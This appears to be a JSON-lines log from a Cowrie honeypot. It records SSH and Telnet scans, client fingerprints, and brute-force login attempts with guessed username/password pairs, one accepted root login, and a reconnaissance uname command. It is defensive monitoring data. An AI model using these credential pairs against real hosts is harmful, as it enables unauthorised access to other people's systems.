{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:59.818009Z","src_ip":"212.227.125.160","session":"49bbacf966bf"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:00.710294Z","src_ip":"212.227.125.160","session":"49bbacf966bf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:01.935910Z","src_ip":"212.227.125.160","session":"49bbacf966bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48722,"dst_ip":"1.2.3.4","dst_port":23,"session":"707429eed8d8","protocol":"telnet","message":"New connection: 212.227.235.229:48722 (1.2.3.4:23) [session: 707429eed8d8]","sensor":"my-vps","timestamp":"2025-08-28T06:33:04.193649Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:04.194819Z","src_ip":"212.227.235.229","session":"707429eed8d8"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:04.195682Z","src_ip":"212.227.235.229","session":"707429eed8d8"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:04.196567Z","src_ip":"212.227.235.229","session":"707429eed8d8"}
{"eventid":"cowrie.session.closed","duration":0.18294358253479004,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:04.376525Z","src_ip":"212.227.235.229","session":"707429eed8d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59008,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9dba6248265","protocol":"ssh","message":"New connection: 212.227.235.229:59008 (1.2.3.4:22) [session: f9dba6248265]","sensor":"my-vps","timestamp":"2025-08-28T06:33:06.359649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:06.360351Z","src_ip":"212.227.235.229","session":"f9dba6248265"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:06.611918Z","src_ip":"212.227.235.229","session":"f9dba6248265"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:07.368572Z","src_ip":"212.227.235.229","session":"f9dba6248265"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:08.623287Z","src_ip":"212.227.235.229","session":"f9dba6248265"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50308,"dst_ip":"1.2.3.4","dst_port":22,"session":"db213ddb7a8d","protocol":"ssh","message":"New connection: 212.227.125.160:50308 (1.2.3.4:22) [session: db213ddb7a8d]","sensor":"my-vps","timestamp":"2025-08-28T06:33:08.713702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:33:08.714998Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:33:08.775097Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biggirl","message":"login attempt [admin/biggirl] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:09.098488Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyond","message":"login attempt [admin/beyond] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:10.160620Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyonce","message":"login attempt [admin/beyonce] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:11.224037Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beepbeep","message":"login attempt [admin/beepbeep] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:12.289774Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42076,"dst_ip":"1.2.3.4","dst_port":23,"session":"47af2eab36ca","protocol":"telnet","message":"New connection: 212.227.125.160:42076 (1.2.3.4:23) [session: 47af2eab36ca]","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.175942Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.177115Z","src_ip":"212.227.125.160","session":"47af2eab36ca"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.178021Z","src_ip":"212.227.125.160","session":"47af2eab36ca"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.178932Z","src_ip":"212.227.125.160","session":"47af2eab36ca"}
{"eventid":"cowrie.session.closed","duration":0.12066841125488281,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.296535Z","src_ip":"212.227.125.160","session":"47af2eab36ca"}
{"eventid":"cowrie.login.failed","username":"admin","password":"becky1","message":"login attempt [admin/becky1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:13.351777Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:14.414920Z","src_ip":"212.227.125.160","session":"db213ddb7a8d"}
{"eventid":"cowrie.session.connect","src_ip":"59.15.99.151","src_port":35826,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e548cf54614","protocol":"ssh","message":"New connection: 59.15.99.151:35826 (1.2.3.4:22) [session: 0e548cf54614]","sensor":"my-vps","timestamp":"2025-08-28T06:33:16.190739Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37462,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc55a548ebf3","protocol":"ssh","message":"New connection: 212.227.125.160:37462 (1.2.3.4:22) [session: fc55a548ebf3]","sensor":"my-vps","timestamp":"2025-08-28T06:33:16.316513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:16.317826Z","src_ip":"212.227.125.160","session":"fc55a548ebf3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:16.540954Z","src_ip":"212.227.125.160","session":"fc55a548ebf3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:16.618875Z","src_ip":"59.15.99.151","session":"0e548cf54614"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:17.213151Z","src_ip":"212.227.125.160","session":"fc55a548ebf3"}
{"eventid":"cowrie.session.closed","duration":31.49042558670044,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:17.498224Z","src_ip":"8.222.212.69","session":"589c7d04290e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:18.437955Z","src_ip":"212.227.125.160","session":"fc55a548ebf3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:20.446362Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.session.closed","duration":180.179114818573,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:20.451800Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60234,"dst_ip":"1.2.3.4","dst_port":22,"session":"f528b4d9be79","protocol":"ssh","message":"New connection: 212.227.235.229:60234 (1.2.3.4:22) [session: f528b4d9be79]","sensor":"my-vps","timestamp":"2025-08-28T06:33:22.783811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:22.784747Z","src_ip":"212.227.235.229","session":"f528b4d9be79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:23.033505Z","src_ip":"212.227.235.229","session":"f528b4d9be79"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:23.782938Z","src_ip":"212.227.235.229","session":"f528b4d9be79"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:25.034192Z","src_ip":"212.227.235.229","session":"f528b4d9be79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59854,"dst_ip":"1.2.3.4","dst_port":22,"session":"e00a756ad518","protocol":"ssh","message":"New connection: 212.227.125.160:59854 (1.2.3.4:22) [session: e00a756ad518]","sensor":"my-vps","timestamp":"2025-08-28T06:33:32.325373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:32.326709Z","src_ip":"212.227.125.160","session":"e00a756ad518"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:32.550396Z","src_ip":"212.227.125.160","session":"e00a756ad518"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:33.206044Z","src_ip":"212.227.125.160","session":"e00a756ad518"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:34.426222Z","src_ip":"212.227.125.160","session":"e00a756ad518"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34794,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbbabf606a07","protocol":"ssh","message":"New connection: 212.227.235.229:34794 (1.2.3.4:22) [session: cbbabf606a07]","sensor":"my-vps","timestamp":"2025-08-28T06:33:38.867353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:38.868329Z","src_ip":"212.227.235.229","session":"cbbabf606a07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:39.122794Z","src_ip":"212.227.235.229","session":"cbbabf606a07"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:33:40.144192Z","src_ip":"212.227.235.229","session":"cbbabf606a07"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":49220,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a7ad01db91c","protocol":"telnet","message":"New connection: 8.222.212.69:49220 (1.2.3.4:23) [session: 1a7ad01db91c]","sensor":"my-vps","timestamp":"2025-08-28T06:33:40.886645Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:41.401044Z","src_ip":"212.227.235.229","session":"cbbabf606a07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54830,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc1bd3e99bd5","protocol":"ssh","message":"New connection: 212.227.125.160:54830 (1.2.3.4:22) [session: cc1bd3e99bd5]","sensor":"my-vps","timestamp":"2025-08-28T06:33:48.452265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:33:48.453501Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:33:48.674709Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:33:49.639556Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:33:50.105266Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:33:50.106068Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:33:50.328223Z","src_ip":"212.227.125.160","session":"cc1bd3e99bd5"}
